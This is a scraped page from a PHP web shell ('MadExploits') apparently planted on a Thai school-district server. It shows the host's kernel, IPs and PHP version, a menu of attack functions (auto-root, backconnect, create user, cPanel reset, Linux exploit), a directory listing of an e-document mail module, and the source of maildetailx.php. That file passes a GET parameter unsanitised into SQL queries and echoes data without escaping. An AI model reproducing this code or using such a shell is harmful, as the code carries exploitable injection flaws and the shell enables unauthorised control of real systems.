Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
mail /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
download.php
2.02
KB
-rw-r--r--
group.php
5.55
KB
-rwxr-xr-x
group_member.php
4.34
KB
-rwxr-xr-x
group_member_report.php
2.99
KB
-rwxr-xr-x
livesearch.php
595
B
-rwxr-xr-x
maildetail.php
9.73
KB
-rwxr-xr-x
maildetail.php-1
4.72
KB
-rwxr-xr-x
maildetailx.php
5.11
KB
-rw-r--r--
permission.php
8.41
KB
-rwxr-xr-x
receive.php
8.81
KB
-rwxr-xr-x
receive.php-1
6.99
KB
-rwxr-xr-x
receive.php-2
7.35
KB
-rwxr-xr-x
receive_mobile.php
7.25
KB
-rwxr-xr-x
search.php
11.3
KB
-rwxr-xr-x
select_send.php
6.45
KB
-rwxr-xr-x
select_send.php-1
5.58
KB
-rwxr-xr-x
select_send_2.php
6.57
KB
-rwxr-xr-x
select_send_3.php
8.89
KB
-rwxr-xr-x
send.php
30.19
KB
-rwxr-xr-x
send.php-1
28.82
KB
-rwxr-xr-x
send_mobile.php
27.75
KB
-rwxr-xr-x
sendto_show.php
2.8
KB
-rwxr-xr-x
sendto_show.php-1
2.19
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : maildetailx.php
<?php session_start(); if(!(isset($_SESSION['login_user_id']))){ exit(); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php if(isset($_SESSION['user_os'])){ if($_SESSION['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } ?> <style type="text/css"> <!-- .style1 { font-size: 12px; } --> </style> </head> <body> <?php date_default_timezone_set('Asia/Bangkok'); require_once "../../../amssplus_connect.php"; require_once("../../../mainfile.php"); require_once("../time_inc.php"); $user=$_SESSION['login_user_id']; #add autolink & auto new line(<br />) to message by Mr.Jedsada Junthasing @04.05.2015 21:05 function autolink($temp) { $temp = preg_replace("#(^|[\n ])([\w]+?://[^ \"\n\r\t<]*)#is", "\\1<a href=\"\\2\" target=\"_blank\"><font color=#FF6600>\\2</font></a>", $temp); $temp = str_replace( "\n", '<br />', $temp ); return ( $temp ) ; } #end function autolink $sql = "select * from mail_main left join person_main on mail_main.sender=person_main.person_id where mail_main.ms_id='$_GET[id]' "; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); $ref_id=$result['ref_id']; $detail=$result['detail']; $send_date=$result['send_date']; $prename=$result['prename']; $name= $result['name']; $surname = $result['surname']; $full_name="$prename$name $surname"; $thai_send_date=thai_date_4($send_date); //บันทึกรับ $day_now=date("Y-m-d H:i:s"); $query_receive =mysqli_query($connect,"select * from mail_sendto_answer where ref_id='$ref_id' and send_to='$user' and answer='0' "); $receive_num=mysqli_num_rows($query_receive); if($receive_num>=1){ $sql = "update mail_sendto_answer set answer='1', answer_time='$day_now' where ref_id='$ref_id' and send_to='$user' "; mysqli_query($connect,$sql); } ?> <div align="center"> <h4><?php echo $result['subject'];?></h4> <table border="0" width="100%" id="table1" style="border-collapse: collapse; border: 1px dotted #FF00FF; ; padding-left:4px; padding-right:4px; padding-top:1px; padding-bottom:1px" cellpadding="2" > <tr> <td bgcolor="#003399" colspan="2" style="border: 1px dotted #808000"><font color="#FFFFFF"> <span lang="en-us"><font size="2"> </font></span><font size="2">รายละเอียดของจดหมาย </font></font></td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> จาก : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $full_name;?></font></td> </tr> <tr> <td width="85" align="left" style="border: 1px dotted #808000"><font size="2"> ข้อความ</font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table2" style="border-collapse: collapse" bordercolor="#808000" cellspacing="2" cellpadding="2"> <tr> <td align="left"><FONT SIZE="2" align="left"><?php echo autolink($result['detail']);?></FONT></td> </tr> </table> </div> </td> </tr> <tr> <td align="left" style="border: 1px dotted #808000"><font size="2"> ไฟล์แนบ </font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellspacing="2" cellpadding="2"> <?php // check file attach $sql_file = mysqli_query($connect,"SELECT * FROM mail_filebook WHERE ref_id = '$ref_id' ") ; $file_num = mysqli_num_rows ($sql_file) ; if ($file_num<> 0) { $list = 1 ; while ($list<= $file_num&&$row= mysqli_fetch_array($sql_file)) { $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; ?> <tr> <td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><A HREF="modules/mail/main/download.php?fileid=<?php echo $file_name;?>&detail=<?php echo $file_des;?>" title="คลิกเพื่อเปิดไฟล์แนบลำดับที่ <?php echo $list;?>" target="_BLANK"><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></A></td> </tr> <?php $list ++ ; } }else { ?> <tr> <td align="left"> <FONT SIZE="2" COLOR="#FF0099"> ไม่มีไฟล์แนบ</FONT></td> </tr> <?php } ?> </table> </div> </td> </tr> </tr> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> วันที่ส่ง : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $thai_send_date;?></font></td> </tr> </table><BR> </div> <!--CENTER><input border="0" src="../images/button95.jpg" name="I1" width="100" height="20" type="image" onClick="javascript:window.close()"></CENTER--> </body> </html>
Close